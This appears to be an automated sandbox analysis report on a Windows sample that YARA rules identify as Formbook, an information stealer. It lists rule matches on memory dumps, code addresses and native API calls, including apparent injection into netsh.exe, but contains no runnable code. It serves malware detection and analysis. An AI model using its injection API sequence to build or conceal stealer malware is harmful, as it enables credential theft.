          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B98250
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B9D2F8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BC78
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C7B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C80
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BEE0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041CFB6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00565C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB090
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1002
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B20A8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B28EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEF900
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2B28
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101EBB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010ADBD2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B22AE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2D07
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1D55
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B25DD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF841F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD466
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE0D20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1FF1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD616
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01006E30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388DBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038922AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038920A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038928EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03881002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389E824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038925DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBEE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDCFB6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBC78
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: String function: 00FEB150 appears 35 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037CB150 appears 35 times
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041870C NtReadFile,NtClose,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187BA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A10 NtQuerySection,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029560 NtWriteFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029760 NtOpenProcess,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A770 NtOpenThread,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A3B0 NtGetContextThread,
